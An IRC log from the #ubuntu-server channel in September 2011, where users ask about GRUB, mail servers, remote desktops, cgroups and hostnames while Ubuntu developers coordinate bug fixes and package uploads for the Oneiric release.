<Guest81533> i need to create a grub.conf file for a mounted drive that has my ubutu-server insalled on it... i installed grub with grub-install but that didn't create the grub.conf file... grub-mkconfig returns error about no finding /
<Guest81533> using a live CD to try and fix the problem
<eriksson25> how do I restart the vsftpd deamon ?
<iarp> eriksson25: stop and then start it.
<eriksson25> with what? Not init.d it complaines. Wont me to use service vsftpd restart but id dont work
<iarp> eriksson25: /etc/init.d/vsftpd stop then start.
<eriksson25> Rather than invoking init scripts through /etc/init.d, use the service(8)
<eriksson25> utility, e.g. service vsftpd stop
<eriksson25> Since the script you are attempting to invoke has been converted to an
<eriksson25> Upstart job, you may also use the start(8) utility, e.g. start vsftpd
#ubuntu-server 2011-09-26
<nomadicus> Hello how can I reconfigure a desktop with Ubuntu 10.04 to function as a headless server?  What I would like to do is connect it to a laptop via crossover cable and interact with it using SSH, RDP, VNC, LTSP, or any combination fo those as well as use it as a file server?  I have configured the grub to boot to console, how do I ensure that those services will start without me loggin into the machine locally?
<VampsDaBeast> hey guys.. i'm using Ubuntu Server 10.04 to try to setup a cloud, when i enter the cmd "sudo -u eucalyptus ssh-copy-id -i ~eucalyptus/.ssh/id_rsa.pub eucalyptus@" i get "RROR no identities found". any idea what i need to do
<uvirtbot> New bug: #859322 in php5 (main) "php5 crashed with SIGILL in initialize_imagick_constants()" [Undecided,Invalid] https://launchpad.net/bugs/859322
<uvirtbot> New bug: #859341 in bacula (main) "Bacula default config flawed" [Undecided,New] https://launchpad.net/bugs/859341
<JohnA1> i have a question about ubuntu servers, particularly postfix-dovecot,  I keep seeing things like "mail_location = maildir:~/Maildir" in which I understand  that the tild/~ refers to the users home directory. But if this is a server how can the mail recipient have a home directory on the server. Surely the only user with an account on the server is/are the  admin
<twb> JohnA1: users with shell accounts will have home directories
<twb> JohnA1: if your users exist only in the mail system, then ~ probably doesn't make sense
<JohnA1> But surely there maust not be any users with shell accounts, other than the admins, and they should not be logging on to the server except to perfom main functions!!!
<twb> That all depends
<JohnA1> twb: on what?
<twb> On what your server is for
<twb> I think it is more common for a server to have normal unix accounts than for them to have mail-only accounts.
<JohnA1> twb: email, web, file, webdav ....
<twb> e.g. a corporation or a university would (usually) be the former; an ISP would usually configure their customers only for the latter
<twb> JohnA1: well, if you're going to be doing file sharing with NFS or Samba, the users' accounts must exist in that subsystem, too.  The easiest way to integrate such things is just to give them conventional accounts.
<JohnA1> twb: why bother they can never log on to the server.
<Anon2553> Quick question if anyone can give me a hand...I'm in my server right now, having an issue I've had once or twice, it resolved itself last time(or rather, I accidentally fixed it I assume). I can't see anything I'm typing. It's making wget a headache
<JohnA1> twb: i am also trying to work out to put such things as "~/.dovecot.sieve" on a system where all the email user are virtual!
<twb> Sorry, I don't know have experience with virtual users
<twb> You can wait here for someone else to respond, and/or try #dovecot and #postfix as appropriate.
<JohnA1> TWB: thats ok I'll work it out. Just its very puzzleing when you are told that there should be no users on a server, hence no home dirs, and then lots of config stuff anchors itself to the home directories of users who should not exist!!!
<twb> I don't know who told you that, but IMO it is wrong
<twb> If you don't want users logging into the system, create normal accounts, but revoke their SSH access
<twb> (e.g. AllowGroups in sshd_config)
<JohnA1> twb: whats the point in having user account on a server if the users cannot log on to access them.
<twb> JohnA1: er, so they have a home directory
<twb> So that dovecot and samba and friends can all just see the users by looking in the normal place, instead of having to be told about separate "virtual" users
<qman__> virtual users are best suited when you have a web server with lots of domains you want separate mail-only users for
<qman__> if you've got other services like that, you should use normal users
<qman__> makes configuration a lot simpler, and as twb said, it's easy to restrict access to the stuff you want them to use
<JohnA1> twb: I was about to we are gong round in circles when I saw you last comment, we have several domains
<twb> Ah, well, I don't have that problem.
<twb> I guess if it were me I would be operating each domain inside an LXC gaol anyway.
<twb> Depends if you have 10 domains or 10,000
<Anon2553> Can anyone tell me how to get what I'm typing into the kernel to show up as I'm typing it again? I'm in Ubuntu Server 11.04 and anything I type is hidden, but still works when I enter it. All I need to do is a simple wget but it's difficult to keep track of the url while I can't see what I'm typing...
<Anon2553> Relatively new to server
<JohnA1> TWB: about 15 domains, some are aliases of others, so we wind up with about 8 silos.
<JohnA1> twb: we were using samba, but switched to webdav as this makes things easier when our purchasing/sales people are travelling particularly in China!
<twb> Then get 8GB of RAM and just run each domain as a gaol, with a separate apache and dovecot instance inside it, and conventional unix users inside it
<twb> You want to do that anyway for apache if they're doing fucked-up things like PHP, to stop one customer's bad PHP code from allowing attackers to bork other domains
<twb> Oh FFS, zenity --help won't give you help output unless you start X
<twb> Which is a big help when I'm dialled in to an airgapped prison over a 56k modem :-/
<blinkiz> Hello. I monitor some files on my servers like the checksum of sshd. It has changed this morning and it is probably just a security update. Anyway, can I verify the current checksum against a value on the Internet somewhere?
<twb> blinkiz: debsums, debsecan
<twb> Possibly something heavier-weight, like tripwire
<blinkiz> twb, Thanks for the suggestions.
<uvirtbot> New bug: #859444 in irqbalance (main) "irqbalance crashed with SIGSEGV in readdir64() (dup-of: 739364)" [Undecided,New] https://launchpad.net/bugs/859444
<RoyK> morning
<jamespage> morning all
<Daviey> twb: DO you have it sorted?
<twb> Daviey: er, context?
<Daviey> twb: zenity --help?
<twb> Oh, sorry
<twb> The problem was I ran zenity --question --test not --text
<Daviey> ah
<twb> Although I did get the --help output by finding a locale lucid box
<twb> *local
<Daviey> groovy
<koolhead11> hi all
<jamespage> Daviey: could you review/accepted the nominations on bug 843701
<uvirtbot> Launchpad bug 843701 in tomcat7 "CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure" [Undecided,Fix released] https://launchpad.net/bugs/843701
<Dramaturg_> Hey all! I need your advice - I have a root-server running Ubuntu Server 11.04. I need to set up some special software there (Wine + Software) for other people to connect over VNC/RDP and use the PC. Now my question is what's the best way to set it up. I installed x11vnc, xorg, unity and started all but I still cant connect.
<twb> You shouldn't have X on a server
<Dramaturg_> twb: The "server" should be just a remote desktop - the software is 60 GB big and people use it very rarely - so I want to have a dedicated pc only for this task
<PleXs> Hi, can anyone tell me how to work with KVM on Ubuntu system? is it just installing ubuntu server and then the kvm packages?
<twb> PleXs: you probably want libvirt-bin on the server and virt-manager on a desktop
<Dramaturg_> twb: and the hoster I use gives only Ubuntu Server version
<twb> Dramaturg_: I've stopped caring
<Daviey> jamespage: looking
<jamespage> ta: bug closed itself when fixes landed in Oneiric
<jamespage> but needs SRU/security fix -> lucid
<jamespage> (and maybe hardy - but that is backports - not done that before)
<x404x> server with no x ? how do i run gui admin utils then ?
<Daviey> jamespage: I assume you know that security will have to sponsor that
<Daviey> ?
<jamespage> Daviey, yes - as they have to go through -security
<Daviey> super
<x404x> in my experience its a lot easyer to run x on the server and use vnc to connect remotely
<x404x> I tryed running x remotely but it did not work well
<PleXs> twb, is there also a web managable manager?
<twb> If you are doing system administration via a web UI, you have already lost.
<twb> x404x: you were probably using fancy-pants modern toolkits that assume you have a fat pipe (like, DMA) between the X server and the app server
<PleXs> twb, I just want to be able to do the administration on multiple platforms
<twb> puppet
<jamespage> Daviey: ta
<x404x> im not sure what u consider a fat pipe, but I was remotely admining this from crappy internet cafees in thailand, 50 people sharing a 512 kb line
<x404x> it can be tuned to use very little bandwith
<twb> 10GiB/s
<twb> And yes, it can be tuned, but stuff like firefox absolutely suck at it
<twb> cf. the environment X was designed for: xterm, xclock and xload
<x404x> I used it with about 20 kb /sec
<twb> x404x: what, firefox?
<x404x> vnc and remote admin
<RoyK> x404x: why not freenx?
<Daviey> rbasak: How is the console conundrum looking?
<x404x> what is the advantage of freenx ?
<x404x> sounds a bit familiar, I might have tried it and it sucked
<Daviey> NX is far superior to vnc.
<Daviey> vnc = bitmaps / tiles, NX is an interactive X
<rbasak> Daviey: AFAICT it should work now save for the apparmor restriction that jdstrand is looking at. If I write to the generated fifo manually then it goes into console_output OK.
<Daviey> rbasak: Fancy pushing to a PPA, so we can try on the lab?
<rbasak> Daviey: it won't work without the apparmor fix
<Daviey> rbasak: we'll teardown apparmor to prove it DTRT without apparmor?
<Daviey> rbasak: can you push it with version string 2011.3-0ubuntu3~ppa0 ?
<rbasak> Daviey: it'll be quicker for me to demo to you with the PPA, do you still want a PPA anyway or just a demo?
<rbasak> s/with/without
 * rbasak has a system that'll give him a test virtual nova installation in one command now
<Daviey> rbasak: either way.. :)
<Daviey> rbasak: do share.
<x404x> hm maybe ill try freenx then, i guess im thinking of free vnc
<x404x> does it use less bandwith than vnc and runs fine on crappy modems ?
<Daviey> !wfm
<ubottu> Common Sense: Just because you can, does not mean you should (and especially recommend to others). Think before you do. "Works for me" does not mean it is ok. The latest version of everything is not always useful if you aim for stability. Please see http://geekosophical.net/random/worksforme/
<rbasak> That's the main improvement in NX - performance - less bandwidth, fewer round trips, etc.
<Daviey> bah, i hate that defintion.
<nigelb> Daviey: Contrary to what you were thinking? :)
<Daviey> Would seem that way
<ersi> Optimize to the maaax! *screams*
<MatBoy> hi guys! I'm wondering if the red5 install using apt-get install red5-server is 100% OK
<spajderix> hi
<spajderix> does any one know how to force fetchmail to use SOCKS5?
 * airtonix looks up what red5 is, sees that it is something written in java, walks away
<jdstrand> Daviey: fyi, while it is in universe, I thought you guys might be interested in CVE-2011-1926 for cyrus-imapd-2.2 (http://www.debian.org/security/2011/dsa-2242)
<uvirtbot> jdstrand: The STARTTLS implementation in Cyrus IMAP Server before 2.4.7 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411. (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1926)
<lynxman> morning everyone o/
<koolhead11> hey lynxman
<lynxman> hey koolhead11
<tjaalton> stgraber: hey, mind if I fix a couple of bugs on sssd, upstream pinged me on #sssd about them
<negronjl> adam_g: ping
<stgraber> tjaalton: feel free :)
<tjaalton> stgraber: thanks
<uvirtbot> New bug: #859658 in postfix (main) "Add SSMTP entry" [Undecided,New] https://launchpad.net/bugs/859658
<hallyn> Daviey: you're pushing the fix for 857746 today?
<hallyn> bug 857746 that is
<uvirtbot> Launchpad bug 857746 in qemu-kvm "Drop capabilities bit in emulated e1000" [Undecided,Confirmed] https://launchpad.net/bugs/857746
<Daviey> hallyn: Do you want to review and sponsor it? :)
<hallyn> Daviey: ok
<kev009_> anyone else think Ubuntu's init system sucks so bad?  like, it completely fails to /etc/init.d/memcached restart has no effect.  or slapd doesn't start on boot with the freaking default installed scripts?
<ikonia> kev009_: it's not ubuntus, most other distros use it too
<Daviey> kev009_: slapd not starting was intentional.. iirc you need to edit /etc/default/slapd
<Daviey> (same goes with puppet.)
<caribou> kev009_: not all the init scripts support the 'restart' statement
<kev009_> caribou: for memcached I've also added stop then start, but it seems to fail under very fast succession (i.e. from a shell script)
<caribou> kev009_: that can happen if the 'stop' sequence is not completed when the 'start' sequence is called upon
<Daviey> start and stopping memcache often suggests you are doing it wrong.
<kev009_> just to stir up some flame, Gentoo's OpenRC never gave me these problems.  would expect the incumbent to get something like this right.
<kev009_> the slapd default thing is known.  best I can tell, it's choking on DNS not being up or something.  circular dependency?
<kev009_> 11.04 on two systems with that problem fwiw
<storrgie> is there a log for what rm does? I've accidentally run it on a file with many symlinks and I'm not sure what it deleted on my system...
<lynxman> adam_g: ping
<Daviey> hallyn: was it ok?
<hallyn> Daviey: the qemu-kvm patch?  yeah, it looked good and i pushed it
<hallyn> (compile-tested fine0
<Daviey> hallyn: If it compiles, ship it - my mantra aswell.
<Daviey> hallyn: accepted btw.
<hallyn> Daviey: for the one-liner, signed off by aliguori, yeah that was good enough for me :)
<Daviey> heh
<hallyn> accepted?
<Daviey> hallyn: package uploads are on manual approval.
<Daviey> ramping up to release!
<hallyn> Daviey: oh right.  thanks then :)
<hallyn> biab
<semiosis> i am trying to upload to my launchpad ppa, which i do regularly, and today I am getting a rejection error from dput stating that the GPG signature verification on my .changes file is not valid.  Full output from dput here: http://paste.ubuntu.com/697339/
<bigjools> ignore it, it's bug 798957
<uvirtbot> Launchpad bug 798957 in launchpad "Uploads are seemingly (but not actually) rejected" [Critical,Triaged] https://launchpad.net/bugs/798957
<semiosis> bigjools: thank you very much!
<bigjools> I am in the middle of diagnosing it so I've not cleared the error justyet
<bigjools> np
<Daviey> bigjools is EVERYWHERE.. waiting to ponce.
<bigjools> worst typo ever
<Daviey> err, pounce.
<bigjools> )
<diogo_79> hi
<diogo_79> how can i see witch version package as instal?l
<adam_g> lynxman: pong
<adam_g> negronjl: ^
<lynxman> adam_g: morning
<diogo_79> from the command line
<negronjl> hi adam_g:  I was looking for your openstack branches but, lynxman sent them my way.  Thanks anyway :)
<diogo_79> i have install the freetds package in ubuntu-server 1.10 64bits but i donÂ´t know what version as install
<diogo_79> ubuntu server 10.10 64 bits
<adam__> hey, im using Ubuntu Server 10.04 and trying to automate everything..  how do i use mysql to set a shell script variable? (IE USER='SELECT username FROM table WHERE id=1')
<PleXs> anyone having corrupt gfx on bootscreen with Ubuntu Server 10.04 ?
<io> adam__: #mysql
<adam__> io: im there but i cant say anything  :(
<RoyK> adam__: echo "select name from table_name where name = 'asdf';" | mysql --disable-column-names -pyourpassword database_name
<RoyK> and then
<RoyK> username=`echo "select name from table_name where name = 'asdf';" | mysql --disable-column-names -pyourpassword database_name`
<RoyK> etc
<RoyK> keep in mind that if that column doesn't have a unique index, you may be in trouble...
<RoyK> adam__: if you can't say anything, the channel may be accepting only authenticated users - try /msg nickserv register|identify
<io> adam__: "/msg nickserv help register"
<RoyK> adam__: the topic on #mysql specifically says you have to register to post anything
<adam__> :s
<adam__> thanks, i see the topic now! didnt notice it :o
<RoyK> adam__: anyway - that oneliner I posted will probably do the job
<Daviey> RoAkSoAx: Are you around?
<Daviey> adam_g: and you?
<Daviey> Ng: Are you going to be upset if i WON'T FIX bug 249443 ?
<uvirtbot> Launchpad bug 249443 in asterisk "Asterisk goes into a catastrophic log rotation loop when a conference recording hits max file size" [High,Incomplete] https://launchpad.net/bugs/249443
<Ng> Daviey: I imagine that would depend on why you WONTFIX it :)
<Daviey> Ng: because nobody other than you seems to care about it. :)
<RoAkSoAx> Daviey: yes I'm around what's up? Im in boston though
<Daviey> RoAkSoAx: Groovy! With bug 827496, it seems that template expansion isn't working with debian style preseeds?
<uvirtbot> Launchpad bug 827496 in cobbler "cobbler kickstart metadata dont affect ubuntu preseed " [High,Incomplete] https://launchpad.net/bugs/827496
<Daviey> Can you confirm?
<Daviey> hallyn: Are you still working on bug 703811 ?
<uvirtbot> Launchpad bug 703811 in kvm "kvm guest's cpu usage with virtio storage driver goes up to 100% because of flush process" [High,Incomplete] https://launchpad.net/bugs/703811
<jamespage> anyone else seeing this error on fresh oneiric server installs? http://paste.ubuntu.com/697380/
<RoAkSoAx> Daviey: i don't think that's the case cause I was working with ksmeta parameters all along and it worked
<RoAkSoAx> Daviey: the only thing is that he needs to manually edit the preseed to reflect those paramters, but each parameter gets inot a variable
<smoser> hallyn, so that lxc-oneiric does hang up pretty fast after 'euca-run-instances'
<smoser> it must be shutting off networking somehow
<RoAkSoAx> Daviey: like USER="ubuntu"
<smoser> but i dont know why it did not do that before...
<RoAkSoAx> Daviey: i'll assign it to myeslf and verify though
<jamespage> might be restricted to folk with a en_GB locale
<Daviey> RoAkSoAx: Fancy askig a suitable question to move it forward / incomplete?
<RoAkSoAx> Daviey: yes will do once I get myself some hardware to play with
<Daviey> smoser: *awesome*
<Daviey> RoAkSoAx: thanks
<Daviey> Anyone seen zul?
<Ng> Daviey: fine :(
<Daviey> RoAkSoAx: I thought you had more hardware this week than you knew what to do with?
<Daviey> rbasak: Before you EOD, can you push a branch regarding the console fix?
<Daviey> or ideally, PPA it?
<Daviey> jdstrand is working on the apparmour issue as we speak.
<hallyn> smoser: yeah
<smoser> jamespage, you're seeing that on oneiric server instance ?
<hallyn> Daviey: no
<smoser> or install ?
<smoser> s/server instance/cloud-iamge instance/
<Daviey> Ng: Sorry.. :(
<jamespage> smoser: instances - both in ec2 and running on my openstack install
<adam_g> Daviey: im here, lost in an email but here
<Daviey> Ng: We both know nobody is actually going to fix it... no point it just staying active for another few years.
<hallyn> Daviey: it's incomplete...
<hallyn> i couldn't reproduce
<jamespage> don't get in on an install - sorry that was not clear
<Ng> Daviey: it's ok, if upstream doesn't care then we might as well ditch it too
<jamespage> and I said install
<smoser> jamespage, cloud-init is not running 'locale'
<Daviey> hallyn: I think if you unassign yourself, the bug will be able to die.
<hallyn> ah
<smoser> jamespage, look at /var/log/cloud-init.log you probably have some trace
<Daviey> Ng: Sorry :(
<hallyn> i had no idea it wouldn't with an assignee!  will do
<jamespage> smoser: http://paste.ubuntu.com/697382/
<jamespage> seems to be running OK
<uvirtbot> New bug: #249443 in asterisk "Asterisk goes into a catastrophic log rotation loop when a conference recording hits max file size" [High,Incomplete] https://launchpad.net/bugs/249443
<rbasak> Daviey: I can do a bzr push now and I'll do a PPA in the morning. Where should I push to? ~racb/ubuntu/nova/832507?
<Daviey> rbasak: works for me. :)
<jamespage> smoser: I can fix it up with a locale-gen for the missing locale but that does not seem right
<Daviey> jamespage: blame smoser.
<rbasak> Daviey: push location? I don't think I understand the LP magic bzr path stuff yet.
<smoser> jamespage, open a bug please.
<jamespage> smoser: ack  - on it now
<Daviey> rbasak: bzr push lp:~racb/ubuntu/oneiric/nova/832507?
<jamespage> smoser: bug 859814
<uvirtbot> Launchpad bug 859814 in cloud-init "Locale issues with beta-2 cloud-images" [Undecided,New] https://launchpad.net/bugs/859814
 * rbasak just managed to crash bzr :-/
<Ursinha> not that hard to do that :P
<Daviey> rbasak: crikey.. stop breaking stuff
<rbasak> Daviey: I always manage to make everything complicated, don't I? :)
<uvirtbot> New bug: #859814 in cloud-init (main) "Locale issues with beta-2 cloud-images" [Undecided,New] https://launchpad.net/bugs/859814
<uvirtbot> New bug: #859816 in bind9 (main) "package bind9 1:9.7.0.dfsg.P1-1ubuntu0.3 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/859816
<rbasak> Daviey: OK, it's in lp:~racb/ubuntu/oneiric/nova/832507
<Daviey> super!
<rbasak> Daviey: revisions 46, 47 and 49 can probably be dropped
<rbasak> (or whatever you do in the bzr world!)
<Daviey> heh
<smoser> jamespage, i cannot reproduce your silly bug
<Daviey> adam_g: How did you get on with libvirt certs?
<Daviey> smoser: probably because you are on a Yank Locale?
<smoser> ah. yeah, and LC_ is slipping through.
<methods1> does ubuntu server log sudo access ?
<SpamapS> methods1: yes, in /var/log/auth.log
<adam_g> Daviey: began looking at it friday PM, gonna work on it today. thinking of using the controller node as a CA that is responsible for distributing keys of new compute nodes to the existing pool
<Daviey> adam_g: groovy!
<Daviey> adam_g: I don't believe migrations works over an ssh tunnel, but if it does - is that easier?
<adam_g> Daviey: need to configure it manually once tho and the libvirt docs a bit RH specific. did you get it working manually with SSL  or did you just disable auth?
<Daviey> adam_g: I used noauth...
<Daviey> I have previously setup certs and it was a royal pain :)
 * Daviey wishes he mde notes
<adam_g> ok
<methods1> thanks
<smoser> jamespage, Daviey can you verify or refute that that behavior will be the case on any remote system that does not have the locale's installed ofr your local locale?
<Daviey> smoser: Hmm.
<Daviey> jamespage: what ami-foo did you get that on?
<jamespage> Daviey: well I use the most recent oneiric images in eu-west
<jamespage> with juju
<jamespage> but I also got it on a local openstack install
<jamespage> beta-1 and beta-2 do the sa,e
<jamespage> same
<Daviey> smoser: so, smoser-ubuntu-images/ubuntu-oneiric-11.10-beta2-amd64-server-20110921.1.manifest.xml ?
<smoser> what about it
<Daviey> that should have this bug?
<Daviey> smoser / jamespage: oddly, i got a US locale
<smoser> Daviey, you might have to set LC_ALL explicitly
<smoser> at least i did to recreate
<Daviey> smoser: ah, yes
<smoser> but i think this is just functioning as intended.
<Daviey> smoser: we only ship US locale?
<utlemming> smoser: is this a purely a cloud-init bug, or is this an image bug?
<smoser> i think it is neither
<smoser> we ship no generated locales.
<smoser> on firt boot, cloud-init generates en_US.UTF-8
<smoser> at one point possibly 10.04, possibly prior, it would look at the ec2 region and eecide the locale to genrate and set as the default
<smoser> (which is broken behavior i think, and i must have "fixed" that)
<smoser> i believe this is mostly similar install behavior from CDs
<smoser> well. sort of. i'm not sure how the installer decides which locales to generate.
<Daviey> smoser: What is the cost to do all the common ones?
<smoser> there is a real cost every time you do an upgrade in time.
<smoser> locale-gen takes real time to run
<Daviey> Probably too late for this cycle, but i wonder if it's worth catching the Locale on first login and generating that?
<smoser> Daviey, i would think that would be a general server issue
<smoser> and we could follow it on the cloud instances
<smoser> and not "probably too late", but "too late"
<Jasonn> Is there any way to resize partitions without formatting?
<Jasonn> or losing data
<jamespage> smoser, Daviey: I get that on a natty image as well
<smoser> right.
<smoser> i commented
<smoser> i suspect its an issue back to 10.04 or before
<smoser> Jasonn, yes, but it is complex.
<Daviey> jamespage: Should we blame smoser ?
<jamespage> Daviey: yep!
<smoser> Daviey, jamespage the real bug, is that i fyou get into the situation that jamespage is in
<smoser> you cannot get out
<smoser> with 'sudo locale-gen en_US.UTF-8'
<smoser> or at least i could not
<Jasonn> smoser: so better off just to reinstall?
<Daviey> smoser: like a cage?
<jamespage> smoser: hmm - not sure about that
<smoser> Jasonn, you might try resizing with a live parted image
<smoser> s/image/disk/
<smoser> http://gparted.sourceforge.net/livecd.php
<smoser> id' give that a try
<smoser> but it will tell you to back up your data
<jamespage> smoser: 'sudo locale-gen en_GB.UTF-8' worked good for me
<smoser> hm..
<smoser> it didn't work fo rme when i was in already.
<smoser> oh well.
<smoser> jjohansen, could you build me a kernel of lucid-updates current with http://people.canonical.com/~smoser/lucid-loaders/dl/README.txt applied ?
<smoser> you'd done that once for me before.
<jjohansen> smoser: sure amd64, i386 or both
<smoser> i think i'm only using amd64, so that is fine
<jjohansen> okay
<hallyn> achiang: hi
<achiang> hallyn: hi, we're playing around with a setup where we want to run ubuntu in a chroot
<achiang> hallyn: right now, we do this the traditional way: set up some bind mounts, do some other stuff in the chroot, then chroot into it
<achiang> it's a graphical environment so we start up gdm with autologin, etc.
<achiang> hallyn: it works fine for now. but there will be a need to suspend/resume this chroot in the future, not just tear it down/set it up every time
<achiang> hallyn: we're based on natty
<hallyn> so you mean gdm on the host, as it's .xsession or whatever, calls a script which sets up the chroot?
<hallyn> or do you mean gdm is running in the chroot?
<achiang> hallyn: more the latter. gdm is running in the chroot
<hallyn> is that in vnc or xnest then?  or where/how do you start the thing up and connect?
<hallyn> well maybe that's not yet so important,
<achiang> we start gdm on the 2nd display output
<hallyn> have you seen lifeless' pages on setting up containers for a launchpad dev environment?
<achiang> no, haven't seen them. i don't think we ever considered containers, but then i saw your planet post and realized that's probably what we need... just trying to get a better idea of how this problem might be solved
<hallyn> ok, 'this problem' - what's the shortcoming with what you've got?
<achiang> the short coming is, "achiang doesn't know how to suspend/resume a chroot" :)
<achiang> starting up a chroot can be expensive, especially if gdm has to start up, unity has to start, etc.
<hallyn> what exactly do you mean by suspend/resume?  there is no (yet) checkpoint/restart, you can only freeze a container
<achiang> freezing would be good enough for our purposes, i think
<hallyn> ok, you can do that without containers if that's preferable,
<achiang> hallyn: sorry for the sloppy terminology, container stuff is pretty new for us
<hallyn> just put them into their own cgroup, and freeze with 'echo FROZEN > /cgroups/gdm/freezer.state'
<hallyn> but switching to containers might make for better reproducability etc anyway
<achiang> is this well supported in natty?
<hallyn> yup
<hallyn> it's purely a kernel feature, CGROUP_FREEZER
<achiang> hm, i'm sorry, we have a natty userspace, but i need to double-check which kernel we're using
<achiang> not good
<achiang> 2.6.35.7
<hallyn> i think lucid has it too
<hallyn> yeah
<hallyn> lucid only disabled NET_NS.  freezer should be there
<hallyn> to confirm, 'mkdir /cgroup; mount -t cgroup cgroup /cgroup; ls /cgroup/freezer*'
<achiang> outside the chroot, right?
<hallyn> i'm being silly.  just grep -i freezer /proc/cgroups
<hallyn> should still work in a chroot, but yeah on the host
<achiang> we don't seem to have a /proc/cgroups
<hallyn> that's bad
<hallyn> are you in control of your kernel by chance?
<achiang> we can influence some Kconfig settings, but i wouldn't say we're really in control of it, no
<hallyn> Kconfig settings is good enough
<achiang> if there's a general backgrounder on cgroups vs containers, that's probably all i need for now
<hallyn> you mean a tutorial
<hallyn> ?
<hallyn> your kernel just needs CONFIG_CGROUPS=y and CONFIG_CGROUP_FREEZER=y
<achiang> yeah, or a whitepaper or even a readme in Documentation/ would be fine
<achiang> well, we need to make a technology choice, i guess and i'm not really informed about pros/cons
<hallyn> Documentation/cgroups
<hallyn> cgroups.txt and freezer-subsystem.txt
<hallyn> achiang: ping me if you have any more questions.  (I'll be on another screen)
<achiang> hallyn: thanks, clearly i need to go do some more homework before asking you questions
<Static> Hello, I have setup a Ubuntu 10.10 Server but it seems to sleep if I leave it a while. Then, obviously, my servers stop responding. How can I stop it from doing this?
<robos> you have X installed on a server?
<zul> RoAkSoAx: something we might want to pull in: http://git.fedorahosted.org/git/?p=cobbler;a=blobdiff;f=cobbler/pxegen.py;h=32c8f01ef246d46e31451676e0b87a6443834497;hp=889f363d4e35472d2a55e79751f698a1e80c7887;hb=8f217f054d274b801e7b8ba68fa1b7909968233b;hpb=9a2220b750a4f835f60e022e510952feed85402b
<robos> hello: If I do an iostat -x -n I see ops/s at 153, r/ops at 35 and 0 w/ops. How can there be 153 ops/s when read ops + write ops is only 35?
<Static> robos: No, I don't.
<zul> smoser: ill pull in the hostname fix
<zul> ivoks: ill pull in the gateway fix
<Static> robos: I installed it onto a laptop and it keeps sleeping.
<robos> Sorry, Static, i've never seen such a thing unless X was installed
<robos> oh
<smoser> zul,  iw as about to prpose it.
<robos> a laptop...
<TheEvilPhoenix> is there a way to assign the FQDN as the hostname of an ubuntu server instance?
<TheEvilPhoenix> FQDN of the server*
<zul> smoser: cool beans
<zul> smoser: ill pull in the branch then ;)
<Static> Yes, it's an old one that I could find no better use for. :)
<robos> Static, i only know how to fix that one from the gui
<smoser> but actually... i'll let you do it
<smoser> as it looks like the branch is broken to me, zul
<zul> smoser: broken as in how?
<smoser> wait.. maybe not. jsut aminute
<Static> robos: Ah, okay.
<zul> Daviey: is there anything else on your list that we need to backport for?
<Daviey> zul: Nothing has jumped out at me, but if you wanted to go through all the core projects trunk and see if there is anything you think?
<zul> ack
<zul> ill probably do an upload on wednesday
<RoAkSoAx> zul: alright.. thought u were doing another git import
<zul> RoAkSoAx: i was...
<zul> RoAkSoAx: but you guys were doing the ense...i mean juju stuff and didnt want to screw you over :)
<adam_g> zul: are the nova-compute-* packages the only ones that make use of an additional --flagfile?
<smoser> zul, where should i push this for you to pull ?
<zul> adam_g: yeah...ill pull in your fix for that as well
<smoser> should i just push to lp:ubuntu/nova ?
<zul> ~ubuntu-server-dev/nova/diablo is the branch i do uploads for
<smoser> so push there?
<adam_g> zul: no wait
<zul> smoser: yes please
<adam_g> zul: i think we can fix it in packaging. ill get something prepared later today
<zul> adam_g: k
<RoAkSoAx> zul: hehe ok
<zul> RoAkSoAx: i could schedule one for friday though
<sh1ny> TheEvilPhoenix, yes you can
<TheEvilPhoenix> sh1ny:  how?
<TheEvilPhoenix> and no i dont mean RDNS :P
<sh1ny> in /etc/hostname put the name part
<sh1ny> in /etc/hosts put the ip that you want to be resolvable and the hostname
<sh1ny> i got something like this
<sh1ny> 127.0.0.1	localhost
<sh1ny> 83.148.126.67	blackwing.dodo.bg	blackwing
<TheEvilPhoenix> i see
<TheEvilPhoenix> thanks
<sh1ny> you might need to
<sh1ny> /etc/init.d/hostname start
<smoser> zul, ok. i pushed there.
<zul> smoser: cool thanks :)
<smoser> pushed as UNRELEASED though
<zul> smoser: sweeet
<RoAkSoAx> zul: alright
<Daviey> zul: So something that is apparent, is merging of the conf files isn't so hot.
<zul> Daviey: how so?
<Daviey> zul: In euca, we has a 'distro default' and a user overides file.. some didn't like that, but it wasn't so bad
<Daviey> perhaps we should have used ucf or something
<zul> Daviey: so maybe something like ucf
<zul> im not a big fan of ucf
<zul> but sure
<Daviey> well /something/.
<uvirtbot> New bug: #859914 in tomcat6 (main) "package tomcat6 6.0.28-10ubuntu2 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/859914
<Daviey> smoser: Something the OSAPI has added is ability to change your mind for X seconds if you terminate an instance, would it be abuse to consider adding that feature next cycle to ec2?
<Daviey> So if enabled, terminate puts it in stopped status for X seconds, before really terminating?
<Daviey> or show terminating, but allow it to be rebooted.
<Daviey> utlemming: Have thoughts? ^
<smoser> i think openstack api is garbage in a lot of places
<smoser> amazon has a solution , which i think is sufficient
<smoser> you modify-instance-attribute and turn on "disableApiTermination"
<smoser> then it wont die
<smoser> essentially the same as 'rm' versus 'rm -f'
<sh1ny> smoser that flag saved my ass a few times when i wasn't paying attention - very useful to have
<smoser> I think the 'X' seconds part of it is somewhat "fanatical"
<smoser> sillyness
<smoser> but... i just learned of it now.
<Daviey> smoser: Ok
<zul> doesnt amazon has a api call saying yes keep my images alive or something?
<smoser> zul read above
<smoser> Daviey, don't you think that is a bit silly?
<smoser> do you think there is real value in "protect me from my self for X seconds" more so than "protect me from myself" ?
<smoser> i'd think it would be useful to have make map disableapitermination in the ec2 api to setting that timeout to 2^32 or something.
<zul> smoser: we need to go through the ec2 api doc and see whats missing and see whats not kosher
<Daviey> zul: ack
<Daviey> smoser: Sure, but i can see it being a nice optional feature
<zul> which means i have to start reading this week
<robbiew> utlemming: ping
<Daviey> zul: Hah.. it isn't compliant, and getting it so before release = fat chance.
<Daviey> Although aws isn't ec2 compliant either. :)
<zul> thank god for standards....*grin*
<soren> Do you guys care about strict EC2 compliance?
<Daviey> Anyone want to tackle a FTBFS?
<ikonia> Daviey: what do you need ?
